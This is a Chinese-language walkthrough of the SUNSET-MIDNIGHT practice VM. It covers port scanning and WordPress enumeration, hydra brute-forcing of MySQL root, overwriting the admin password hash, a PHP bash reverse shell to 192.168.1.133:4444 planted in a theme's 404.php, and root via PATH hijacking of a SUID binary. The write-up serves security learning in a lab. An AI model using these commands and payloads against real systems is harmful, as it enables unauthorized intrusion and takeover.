SUNSET-MIDNIGHT靶机练习
声明
笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。
✍🏻作者简介:致力于网络安全领域,目前作为一名学习者,很荣幸成为一名分享者,最终目标是成为一名开拓者,很有趣也十分有意义
🤵♂️ 个人主页: @One_Blanks
欢迎评论 💬点赞👍🏻 收藏 📂加关注+
- 关注公众号:泷羽Sec-Blanks
X
带你去体验最真实的渗透环境,文章里不会直接摆答案,会全面的带你去进行信息收集以及漏洞利用,会领着你一步一步踩下我踩过的坑,实战往往比这更绝望,练技术须实践。
目录
一、主机发现+信息收集
(一)信息收集
arp-scan -l
(二)环境变量设置
export ip=192.168.1.135
(三)端口扫描
nmap --min-rate 10000 -p- $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
(四)服务信息收集
nmap -sS -sV -O -p22,80,3306 $ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MariaDB 5.5.5-10.3.22
MAC Address: 00:50:56:3C:94:80 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
(五)默认脚本扫描
nmap --script=vuln -p22,80,3306 $ip
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /blog/: Blog
| /wp-login.php: Possible admin folder
| /wp-json: Possible admin folder
| /robots.txt: Robots file
| /readme.html: Wordpress version: 2
| /feed/: Wordpress version: 5.4.2
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
| /contact/: Potentially interesting folder
|_ /home/: Potentially interesting folder
3306/tcp open mysql
MAC Address: 00:50:56:3C:94:80 (VMware)
或
nikto -h 192.168.1.135
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.135
+ Target Hostname: 192.168.1.135
+ Target Port: 80
+ Start Time: 2025-04-07 00:47:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://sunset-midnight/
+ /aCOYkcj5.axd: Drupal Link header found with value: <http://sunset-midnight/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /home/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpress/wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpress/: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wp-login.php: Wordpress login found.
+ 8108 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2025-04-07 00:50:01 (GMT-4) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
二、开始渗透
(一)22端口
Nday
┌──(root㉿kali)-[/home/kali/bc]
└─# searchsploit OpenSSH 7.9
Exploits: No Results
Shellcodes: No Results
爆破
这里我们暂时不知道任何有关用户的信息,所以先跳过这一步,先到Web 中收集信息。
(二)80端口Web应用
访问
我们发现直接访问是访问不到的我们需要先做一个映射,让我们输入的ip可以被解析为域名
WIndows 修改 C:\Windows\System32\drivers\etc\hosts 文件
Linux 修改 /etc/hosts
然后我们就可以正常访问了。并且这是一个wordpress的站
访问 http://sunset-midnight/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1 后台登录页面
没啥信息了,我们用wpscan扫描一下
wpscan --url http://sunset-midnight 直接扫描
[+] URL: http://sunset-midnight/ [192.168.1.135]
[+] Started: Mon Apr 7 01:23:38 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://sunset-midnight/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://sunset-midnight/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
| Last Updated: 2024-11-12T00:00:00.000Z
| Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.8
| Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simply-poll-master
| Location: http://sunset-midnight/wp-content/plugins/simply-poll-master/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=========================================> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Apr 7 01:23:43 2025
[+] Requests Done: 172
[+] Cached Requests: 7
[+] Data Sent: 43.303 KB
[+] Data Received: 444.822 KB
[+] Memory used: 273.512 MB
[+] Elapsed time: 00:00:04
根据信息我们找到了admin用户,可以尝试爆破,并且我们得到了版本信息可以查nday 5.4.2
nday 这里需要插件,没有
那就尝试爆破然后看3306
wpscan --url http://sunset-midnight/ -P /usr/share/wordlists/rockyou.txt -U admin
也是没爆破出来什么,但是3306出货了
(三)3306端口数据库
这里就是尝试爆破了
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135
(如果现在没有这个字典的话需要先到改目录下用 gunzip解压一下)
┌──(root㉿kali)-[/home/kali/bc]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-07 01:11:50
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.1.135:3306/
[STATUS] 12.00 tries/min, 12 tries in 00:01h, 14344387 to do in 19922:46h, 4 active
[STATUS] 12.00 tries/min, 36 tries in 00:03h, 14344363 to do in 19922:44h, 4 active
[3306][mysql] host: 192.168.1.135 login: root password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-07 01:18:45
成功找到一组账号root robert
mysql -h 192.168.1.135 -u root -p
我这里的新版mysql爆了一下错
┌──(root㉿kali)-[/home/kali]
└─# mysql -h 192.168.1.135 -u root -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
mysql -h 192.168.1.135 -u root -p --ssl=0
show databases; 查看数据库
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress_db |
+--------------------+
use wordpress_db 选择一个库
show tables; 查看表
+------------------------+
| Tables_in_wordpress_db |
+------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_sp_polls |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+------------------------+
select * from wp_users; 查看表中的数据
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 | | 0 | admin |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
这里是用的md5加密,加密了admin的密码
pmd5.com
ttmd5.com
www.somd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash
找在线网站破解 发现没搞出来
我们直接修改数据库覆盖,反正是root权限
这里直接用md5函数了
update wp_users set user_pass = MD5(‘123456’) where ID=1; 直接update修改
然后访问
http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1
admin 123456
直接进入
搞一个php的反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.133/4444 0>&1'");?>
然后Kali里面开启监听
nc -nvlp 4444
在这里直接将代码嵌入进去
http://sunset-midnight/404.php 直接访问拿到shell
三、获得初始权限
四、提权
ls
先看config
cat wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );
/** MySQL database username */
define( 'DB_USER', 'jose' );
/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '9F#)Pk/=&SyQ/>UVRBXx$}e&>G@(+m6L|_{Emur&fv&fO_+wbJ`-6QnE_7hI|Y<p');
define('SECURE_AUTH_KEY', 'p#Eh5#4W~p4-Iue2M)H/?[dp`BS;$7o~Kb%F?&S-Zv=rH#;U%`9G#VR`l^,8j$M+');
define('LOGGED_IN_KEY', '0{YUw?X%j+ej-0du&FW@QkVP?b(#QsQfu[Q%<QS_Lpc1UI1|st:EJr)d*$g/iJ18');
define('NONCE_KEY', '%)thH*l;)A^S#8WQ!8TKAnQ;uNXNKv<f.|PyYijgztda70y-4m~DTyqr^X!$JwX#');
define('AUTH_SALT', '<Kd5.3^|yo:/fw2Y|PTb4!bU~5uRv7Z(n0;~jOXoO7MC]j/ICu[tY!)g4Oah-{oa');
define('SECURE_AUTH_SALT', 'dmYQvQ1Ap&z~JUHUaKR6]<rm7^ydGAp(/EH&+vrAi6cBpi?F7XKTc@Ahm:|h*wR;');
define('LOGGED_IN_SALT', '5+Iw-;-j+2rD3WgRtSM`!zDb5I%LLU0]Awk-Cma:f4xrJv%k~/@+TthXY_[JpjfK');
define('NONCE_SALT', 'iDo3}y9z;@c~a)ZLT:7|.ZCp-0sK4>T1p&%MhGt_TUu+HFpPjn-no`:8sI0BA);y');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
用户 jose 密码 645dc5a8871d2a4269d4cbe23f6ae103
密码解不出来,尝试直接登录
su jose
密码 645dc5a8871d2a4269d4cbe23f6ae103
好吧没有加密直接明文登上了
交互式提升
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
特权程序
find / -perm -u=s -ls 2>/dev/null
一眼看中了 /usr/bin/status 非标准系统工具
jose@midnight:/home$ status
status
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
Active: active (running) since Mon 2025-04-07 03:33:00 EDT; 1h 21min ago
Docs: man:sshd(8)
man:sshd_config(5)
Process: 539 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
Main PID: 552 (sshd)
Tasks: 1 (limit: 1148)
Memory: 3.6M
CGroup: /system.slice/ssh.service
└─552 /usr/sbin/sshd -D
Apr 07 03:33:00 midnight systemd[1]: Starting OpenBSD Secure Shell server...
Apr 07 03:33:00 midnight sshd[552]: Server listening on 0.0.0.0 port 22.
Apr 07 03:33:00 midnight sshd[552]: Server listening on :: port 22.
Apr 07 03:33:00 midnight systemd[1]: Started OpenBSD Secure Shell server.
strings /usr/bin/status string程序硬编码
jose@midnight:/home$ strings /usr/bin/status
strings /usr/bin/status
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Status of the SSH server:
service ssh status
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
status.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
我们可以看到程序内部存在 system 函数,并且执行了 service ssh status 的命令
那我们就可以进行命令劫持完成提权
echo $PATH 先记一下路径
恶意脚本
echo ‘/bin/bash -p’ > /tmp/service
chmod +x /tmp/service
劫持PATH
export PATH=/tmp:$PATH
执行
/usr/bin/status
输入id发现我们已经是root权限了
之后可以改回原来的PATH变量值
五、提权成功
扫一扫
557
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
